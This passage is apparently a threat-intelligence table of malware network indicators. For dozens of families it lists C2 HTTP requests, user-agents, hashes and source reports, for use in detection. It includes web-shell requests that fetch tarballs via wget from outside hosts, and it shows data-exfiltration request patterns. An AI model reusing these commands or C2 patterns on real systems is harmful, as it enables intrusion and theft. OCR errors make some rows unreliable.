wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A" /AWS "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: dot.faawan.com:443
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 443 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
IXESHE AES GET "/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M" /AES "/AES210001 129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M
User-Agent: Mozilla/4.O (compatible; MSIE 5.01; Windows NT 5.0)
Host: 140.119.44.181
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
JBOSS worm GET /zecmd/zecmd.jsp?comment=perl+lindb.pl /zecmd.jsp?comment= http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/
JBOSS worm GET "
/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
" idssvc.jsp?comment=
JBOSS worm GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz idssvc.jsp?comment=
Letsgo / TabMsgSQL GET "/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc
ode%20=%20'IXLCGIXELZ'" /indexbak.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: <hostname>
Connection: Keep-Alive" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://intelreport.mandiant.com/
Letsgo / TabMsgSQL GET "/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20
from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc" /1.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://www.matasano.com/research/PEST-CONTROL.pdf
Letsgo / TabMsgSQL GET "/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20
('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',
'2011-06-08%2013:45:54','NMQVPTXFBH')" /1.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://www.matasano.com/research/PEST-CONTROL.pdf
Letsgo / TabMsgSQL downloader GET /new/iistart.html /iistart.html "Accept: /
User-Agent: lt-764-238+Windows+NT+5.171
Host: 122.147.13.8" lt-764-238+Windows+NT+5.171 2b1c03b4e34a123e5317182e6159e38a http://www.cyberengineeringservices.com/trojan-letsgo-analysis/
Likseput GET /index.html /index.html "User-Agent: 5.1 10:59 DELLXT\Laura
Host: nasa.usnewssite.com
Cache-Control: no-cache" 5.1 10:59 <PC-Name>\<Username> E019E37F19040059AB5662563F06B609 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Lingbo (?) POST "/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM
>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb" /search% "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322)
Host: globalizationinteriorgov.net
Content-Length: 14277
Connection: Keep-Alive
Cache-Control: no-cache
2.r.)... ‘.5.. ,—. .i.-..dq...R.’3.w....>N.B.—z. .e90)rw.b-b9QGhT. .. .3. .n.>j.hLe" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) 20DD4DD02C2B17A40B26843AA0C660F6 http://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html
Luckycat - WIMMIE POST /count/count.php?m=c&n=[HOSTNAME]_ /count.php?m=c&n= "Accept: /
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: [HOSTNAME]
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
Medfos GET /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== /id= "Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 0512E73000BCCCE5AFD2E9329972208A http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
MiniASP GET /device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercaseletters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters> /device_ "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,
image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: <decoded_server>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) e476e4a24f8b4ff4c8a0b260aa35fc9f http://intelreport.mandiant.com/
MiniASP GET /record.asp?device_t=<random 10 digits> &key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data> /record.asp?device_t= "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: <decoded_server>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) e476e4a24f8b4ff4c8a0b260aa35fc9f http://intelreport.mandiant.com/
Miniduke POST /index.php /index.php "Content-Type: multipart/form-data; boundary=----------------------- 2856073314169
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; .NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2)
Host: bolsilloner.es
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
----------------------------2856073314169
Content-Disposition: form-data; name=”fname”
ibarext32. blb
----------------------------2856073314169
Content-Disposition: form-data; nanie”i”
b3cdbdo92e2ce
----------------------------I 2856073314169
Content-Disposition: form-data; name=’c’
2
" Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; . NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/its-a-kind-of-magic-1.html http://www.securelist.com/en/blog/208194129/The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_0x29A_Micro_Backdoor
Mirage POST /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow /resuIt?hl=en "Accept: / ..Accept-Laguage: en-us..
Uiser-Agent: Mozilla /4.0 (compatibIe; MSIE 6.0; Windows NT 5.1)
Connection: close
Content-Length: 293
Content-Type: appIcaton/x-www-form-urlencoded
Ericodng: gzdp, deflate.Pragma: no-cache
Host: (C&C):443
Mtdkj..21:DFkJL$KO #S%&t+,’r.ABCD_abcde(ghijklmnopqrstuvwxyz( I 9142@alv" Mozilla/4.0 (compatibIe; MSIE 6.0; Windows NT 5.1) 443 http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/
Mirage - later var GET /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg /search?hl=en&q= ASH-1.3: 1 Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/
Money loader GET "/get_xml?file_id=25227372
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536" /get_xml?file_id= "Accept: /
User-Agent: tiny-dl/nix
Host: takeinfo.ru""
============
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
User-Agent: tiny-dl
Host: binupdate.mail.ru
Cache-Control: no-cache""" "tiny-dl/nix 
tiny-dl" 4e801b46068b31b82dac65885a58ed9e http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Mongal GET /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 61.178.77.169:84
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) C6F01A6AD70DA7A554D48BDBF7C7E065 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Murcy GET /150828 /150828 "Connection: Keep-Alive
Accept: /
Host: path.alyac.org
User-Agent: Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1)
Extra-Data-Bind: DE6A34D80D43B930
Extra-Data-Space: 65536
Extra-Data:
4ZFNSAAEAAh2AoNAAAAAAgRCHACwoSogAjKhCCf/HA
AVNAAAAeAAAgDBAAABIAAAs0kAAUAAAAQAAAAAooAA
AIAAAAATAAAAKCAAAgKAAAgqAAAA4CAAAgNAAAAOAM
DA3AgQAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxAEEAzAQOAADA5AAMAkDAwAgNAkDAxAAAAMFAlB
gcAYHApBwYAUGAgAAUAEGAjBwaAACAzAAAAAAATBQW
AMFAUBQRA0EAAAwVA8EAXBQLAUEA4AQRAxxxxxxxxx
xxxxxxxxxx2AAAAAAA
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1)" http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
Netravler GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT /nettraveler.asp?action=getcmd&hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 1f26e5f9b44c28b37b6cd13283838366 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Netravler GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt /nettraveler.asp?hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 1f26e5f9b44c28b37b6cd13283838366 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Netravler GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end /nettraveler.asp?hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.vipyandex.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSBQCTCA=EFKILJMDFNHODIDELKHIFDMH

HTTP/1.1 200 OK
Connection: close
Date: Sun, 07 Oct 2012 03:37:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10
Content-Type: text/html
Cache-control: private

Success:88" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) DA5832657877514306EDD211DEF61AFE http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
NfLog GET /IElog/TestURL.asp HTTP/1.0 /IElog/ "/IElog/TestURL.asp HTTP/1.0
User-Agent: www
Host: www.aviraco.com
Content-Length: 10
Pragma: no-cache

1234567890" www D4859FC951652B3C9657F8621D4DB625 http://contagiodump.blogspot.com/2012/02/feb-9-cve-2011-1980-msoffice-dll.html
NfLog POST /NfLog/Nfile.asp /NfLog/ "/NfLog/Nfile.asp
Accept: /
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.mlitjcab.com
Content-Length: 0
Cache-Control: no-cache" Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) 0612B3138179852A416379B3E85742EA http://contagiodump.blogspot.com/2012/08/cve-2012-0158-generated-8861-password.html
NTESSESS GET /6K8gL8.html /6K8gL8.html "/6K8gL8.html
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Cache-Control: no-cache
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 692cb0fca66738055396e1e1c8f0d52c http://www.cyberengineeringservices.com/malware-obfuscated-within-png-files-sample-2-2/
PNG trojan GET /index.htm /index.htm "/index.htm
User-Agent: Windows+NT+5.1
Host: www.muckleshoot.nsn.us
Cache-Control: no-cache
The content of index.htm is parsed for the HTML comment tag:
<!--...-->" Windows+NT+5.1 1efc0c20b0445bc081890f16f59e672b http://www.cyberengineeringservices.com/the-png-trojan-%E2%80%93-acrord32-exe/
Poison Ivy GET "256 bytes of seemingly random data after a successful 
TCP handshake, then 48 byte “keep-alive” requests" http://contagiodump.blogspot.com/2012/04/poisonivy-traffic.html http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
RedOctober AuthInfo POST http://%s:%s%s "Host: %s:%s
Pragma: no-cache
Cache-Control: no-cache
Content-length: %u
Content-Type: application/x-www-form-urlencoded
POSTDATA" "793c82efc65a43ed249a45ec7c69a388 
428de53f1a1eaa040847b6456b7e5369" http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack
RedOctober Sysinfo POST /cgi-bin/nt/sk /cgi-bin/nt/sk "Host: %CnC%
Connection: close
Content-Length: %d\r\n\r\n
DATA" "e36b94cd608e3dfdf82b4e64d1e40681
a2fe73d01fd766584a0c54c971a0448a" http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack
RegSubDat POST /5501000000/log /5501000000/log "Accept: /
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Host: ibm.asia-online.us:80
Content-Length: 90
Proxy-Connection: Keep-Alive" Mozilla/4.0 c5860171f919761db9ee78ef3dac5ab4 http://www.cyberengineeringservices.com/india-united-states-naval-cooperation-doc-analysis/
Sanny / Win32.Daws POST /write.php /write.php "Host: board.nboard.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://board.nboard.net/form.php?db=kbaksan_1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5248

[snip]
db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(0_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ- 
nGkfaKu7KKsxvv&tlink=HTTP/1.1 302 Found" Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 b00ae5492ce724fd01b926a7f7cb3e66 http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html
Seasalt GET /postinfo.html /postinfo.html "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM
Host: ubuntuguru.strangled.net
Connection: Close" Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM f0726aadcf5d66daf528f79ba8507113 http://intelreport.mandiant.com/
Sofacy POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 /cgi-bin/brvc.cgi? "/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
User-Agent: MSIE 8.0
Host: 200.106.145.122
Content-Length: 6
Cache-Control: no-cache" MSIE 8.0 a2a188cbf74c1be52681f998f8e9b6b5 1DA0C961C7AF849071AB86CAAF846B2A http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Sofacy POST /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS /cgi-bin/qfa.cgi? "/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
Referer: /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
User-Agent: MSIE 8.0
Host: 200.106.145.122
Cache-Control: no-cache" MSIE 8.0 1DA0C961C7AF849071AB86CAAF846B2A
Srizbi GET /cb_4.exe /cb_4.exe "/cb_4.exe 
Accept: / Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
Host: spacestorminc.com Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 06E589B4E3AB93C6B16389DD79549A7A http://www.fireeye.com/blog/technical/botnet-activities-research/2008/08/srizbi-alongwit.html
Stabuniq POST /rssnews.php /rssnews.php "/rssnews.php
Content-Type: application/x-www-form-urlencoded
Host: benhomelandefit.com
Content-Length: 1093
Cache-Control: no-cache
id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=[snip]&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1" F31B797831B36A4877AA0FD173A7A4A2 http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html
Sykipot / Wyksol GET /kys_allowget.asp?namegetkys.kys /namegetkys.kys "/kys_allowget.asp?namegetkys.kys
Accept: /
User-Agent: HTTP-GET
Host: www. top10member . corn
Cache-Control: no-cache" "http://www.sans.org/reading_room/whitepapers/malicious/detaile
http://blog.trendmicro.com/the-sykipot-campaign/
"
Taidoor GET /apzsr.php?id=021793111D309GE67E /apzsr.php?id= "/apzsr.php?id=021793111D309GE67E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 211.234.117.141:443
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 443 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html
Tarsip Eclipse GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 /redir?di= "/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
UA-CPU: x86
Accept:
text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1
Accept-Language: en-us
Accept-Encoding: gzip;q=0.8, deflate;q=0.5
Cookie: CLIP=<encoded host information>
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: <C2 server address>
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 123505024F9E5FF74CB6AA67D7FCC392 http://intelreport.mandiant.com/
Tarsip Moon GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 /2055?meth=gc&tid= "UA-CPU: x86
Accept:
text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1
Accept-Language: en-us
Accept-Encoding: gzip;q=0.8, deflate;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: <hostname>" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) 95f25d3afc5370f5d9fd8e65c17d3599 http://intelreport.mandiant.com/
Tbot tor n "...........P.......+.l.....U..w_..?z5.U.!....:.
...9.8.....5.........3.2............./.........
.....
.....Y.........www.fjpv.com.........
.4.2...................
.....
.........................#." FC7C3E087789824F34A9309DA2388CE5 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Tinba aka Zusy POST /h/index.php /index.php "Host: dakotavolandos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13

y0J.......ii.HTTP/1.1 200 OK
-- see the link" Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 c141be7ef8a49c2e8bda5e4a856386ac http://contagiodump.blogspot.com/2012/06/amazon.html
Vinself POST /w880/T19R17Q16/12010L11014 "Accept: image/gif, image/x—xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept—Language: zh—zh
Content-Type: application/octet—stream
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1)
Host: ftp.[remived].com
Content-Length: 90
connection: Keep-Al ive

Cache-control: no-—cache'

GIF89aP. . .m.w. u. p. a.3.3.i.i6U:X0Q<" Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) http://www.fireeye.com/blog/technical/malware-research/2010/11/winself-a-new-backdoor-in-town.html
Vobfus GET /XEuPCLrf?e /XEuPCLrf?e "/XEuPCLrf?e
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
Host: 82747.ddnsd.at

" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) s70F0B7BD55B91DE26F9ED6F1EF86B456 http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html
WEBC2-Bolid GET /firefox.html /firefox.html "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: <hostname>
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 5ff3269faca4a67d1a4c537154aaad4b http://intelreport.mandiant.com/
WEBC2-Clover GET /Default.asp /Default.asp "Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Win32)
Host: 209.161.249.125
Connection: Keep-Alive
Cookie: PREF=86845632017245" "Mozilla/4.0 (compatible; MSIE 7.0; Win32)
Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
When instructed to download a file, the malware will use the following User-Agent:
Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.012" 2fccaa39533de02490b1c6395878dd79 http://intelreport.mandiant.com/
WEBC2-CSON GET /Default.aspx?INDEX=<10_random_characters> /Default.aspx?INDEX= "User-Agent: Win32
Host: 66.129.222.1
Connection: Keep-Alive" "<HOSTNAME> 
When instructed to download a file, the malware will use the following User-Agent: 
Windows+NT+5.1" 50f35b7c86aede891a72fcb85f06b0b7 http://intelreport.mandiant.com/
WEBC2-CSON Response to commands POST /Default.aspx?ID=IMNQRSSRXK /Default.aspx?ID= "Accept: text/
Content-Type: application/x-www-form-urlencoded
User-Agent: Win32
Host: 70.62.232.98
Content-Length: 16
Cache-Control: no-cache
pn9OrT8wrT9Apn8=" "Win32 
<HOSTNAME> 
When instructed to download a file, the malware will use the following User-Agent: 
Windows+NT+5.1" 50f35b7c86aede891a72fcb85f06b0b7 http://intelreport.mandiant.com/
WEBC2-HEAD GET / / "/
User-Agent: WinHTTP 1.0
Host: www.olmusic100.com
Content-Length: 28
Connection: Keep-Alive
Y29ubmVjdCBURVNUTUFDSElORQ==" WinHTTP 1.0 649d54bc9eef5a60a4b9d8b889fee139 http://intelreport.mandiant.com/
WEBC2-Table GET /order.htm /order.htm "User-Agent: <current_time>+<hostname>
Host: meeting.toh.info
Connection: Keep-Alive
Cache-Control: no-cache
The malware uses the following User-Agent string: <current_time>+<hostname>" <current_time>+<hostname> 7a7a46e8fbc25a624d58e897dee04ffa http://intelreport.mandiant.com/
Xpaj POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh /DxODlv? "Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
nortiniolosto.com" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) D5C12FCFEEBBE63F74026601CD7F39B2 http://contagiodump.blogspot.com/2012/05/mbr-rootkit-xpaj-sample.html
